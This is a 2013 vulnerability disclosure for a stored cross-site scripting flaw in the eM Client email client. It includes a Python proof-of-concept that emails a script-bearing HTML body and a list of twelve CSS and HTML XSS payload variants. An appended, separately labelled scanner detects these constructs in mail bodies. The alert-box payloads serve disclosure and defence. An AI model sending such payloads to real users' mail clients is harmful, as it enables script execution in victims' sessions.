eM Client 5.0.18025.0 Cross Site Scripting

Posted Sep 10, 2013
Authored by loneferret

eM Client e-mail client version 5.0.18025.0 suffers from a stored cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 58d63f0347684b64df7ea221869f6c49d7b63d4b6ed451c1bfe8a5229f8066e7

#!/usr/bin/python
'''

Author: loneferret of Offensive Security
Date: 22-08-2013
Product: eM Client for Windows
Version: 5.0.18025.0 (previous versions and other platforms may be vulnerable)
Vendor Site: http://www.emclient.com/
Software Download: http://www.emclient.com/download

Tested on: Windows XP Pro SP3 Eng.
Tested on: Windows 7 Pro SP1 Eng.
eM Client: Using default settings


E-mail client is vulnerable to stored XSS. Either opening or viewing the e-mail and you
get an annoying alert box etc etc etc.
Injection Point: Body

Gave vendor 7 days to reply in order to co-ordinate a release date.
Timeline:
23 Aug 2013: Tentative release date 30 Aug 2013
23 Aug 2013: Vulnerability reported to vendor. Provided a list of payloads
26 Aug 2013: No response from vendor, sent a reminder email
27 Aug 2013: Vendor responded, will issue update to fix within 14 days
27 Aug 2013: Tentative release date pushed to September 10th 2013
27 Aug 2013: Replied to vendor with new date
09 Sep 2013: Contacted vendor with reminder of release date
09 Sep 2013: Vendor responded with go ahead with release
10 Sep 2013: Public release

'''

import smtplib, urllib2

payload = '''<DIV STYLE="background-image: url(javascript:alert('XSS'))">'''

def sendMail(dstemail, frmemail, smtpsrv, username, password):
    msg = "From: hacker@offsec.local\n"
    msg += "To: victim@offsec.local\n"
    msg += 'Date: Today\r\n'
    msg += "Subject: XSS payload\n"
    msg += "Content-type: text/html\n\n"
    msg += payload + "\r\n\r\n"
    server = smtplib.SMTP(smtpsrv)
    server.login(username,password)
    try:
        server.sendmail(frmemail, dstemail, msg)
    except Exception, e:
        print "[-] Failed to send email:"
        print "[*] " + str(e)
    server.quit()

username = "test@test.com"
password = "123456"
dstemail = "test@test.com"
frmemail = "hacker@offsec.local"
smtpsrv = "172.16.61.165"

print "[*] Sending Email"
sendMail(dstemail, frmemail, smtpsrv, username, password)

'''
# Payloads
[+] Payload 1 : DIV background-image 1
[+] Code for 1 : <DIV STYLE="background-image: url(javascript:alert('XSS'))">
------------
[+] Payload 2 : DIV background-image 2
[+] Code for 2 : <DIV STYLE="background-image: url(javascript:alert('XSS'))">
------------
[+] Payload 3 : DIV expression
[+] Code for 3 : <DIV STYLE="width: expression(alert('XSS'));">
------------
[+] Payload 4 : IMG STYLE w/expression
[+] Code for 4 : exp/*<XSS STYLE='no\xss:noxss("*//*");
xss:ex&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
------------
[+] Payload 5 : List-style-image
[+] Code for 5 : <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
------------
[+] Payload 6 : STYLE w/Comment
[+] Code for 6 : <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
------------
[+] Payload 7 : STYLE w/Anonymous HTML
[+] Code for 7 : <XSS STYLE="xss:expression(alert('XSS'))">
------------
[+] Payload 8 : STYLE w/background-image
[+] Code for 8 : <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
------------
[+] Payload 9 : TABLE
[+] Code for 9 : <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
------------
[+] Payload 10 : TD
[+] Code for 11 : <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
------------
[+] Payload 12 : Commented-out Block
[+] Code for 12 : <!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->
----
'''
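
A defender-side check for the constructs in the payload list above, as an added example (not part of the original advisory and not eM Client's code): it parses an HTML mail body with Python 3's standard html.parser and names the active-content families it finds. The function, class and finding names are assumptions made for this example, and it is a triage heuristic for gateways or regression tests, not a sanitizer.

```python
import re
from html.parser import HTMLParser

CSS_COMMENT = re.compile(r"/\*.*?\*/", re.S)
SCRIPT_URL = re.compile(r"(javascript|vbscript):")
CSS_SCRIPT_URL = re.compile(r"url\(['\"]?(javascript|vbscript):")

def squash(text):
    # Lowercase; drop whitespace, NULs and backslashes used to split keywords.
    return re.sub(r"[\s\x00\\]+", "", text).lower()

class ActiveContentScanner(HTMLParser):
    """Collects names of active-content constructs in an HTML mail body."""
    def __init__(self):
        super().__init__()
        self.findings, self._in_style = set(), False

    def _check_css(self, css):
        flat = squash(CSS_COMMENT.sub("", css))  # expr/*x*/ession -> expression
        if "expression(" in flat:
            self.findings.add("css-expression")
        if CSS_SCRIPT_URL.search(flat):
            self.findings.add("css-script-url")

    def handle_starttag(self, tag, attrs):
        self._in_style = tag == "style"
        if tag == "script":
            self.findings.add("script-element")
        for name, value in attrs:
            if name == "style":
                self._check_css(value or "")
            elif SCRIPT_URL.match(squash(value or "")):
                self.findings.add("script-url-attribute")

    def handle_endtag(self, tag):
        self._in_style = False

    def handle_data(self, data):
        if self._in_style:
            self._check_css(data)

    def handle_comment(self, data):
        if data.lstrip().lower().startswith("[if"):
            self.findings.add("conditional-comment")

def scan_html_body(body):
    scanner = ActiveContentScanner()
    scanner.feed(body)
    scanner.close()
    return sorted(scanner.findings)
```

Call scan_html_body on the decoded text/html part of a message; an empty list means none of these families matched, not that the body is safe to render with scripting enabled.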
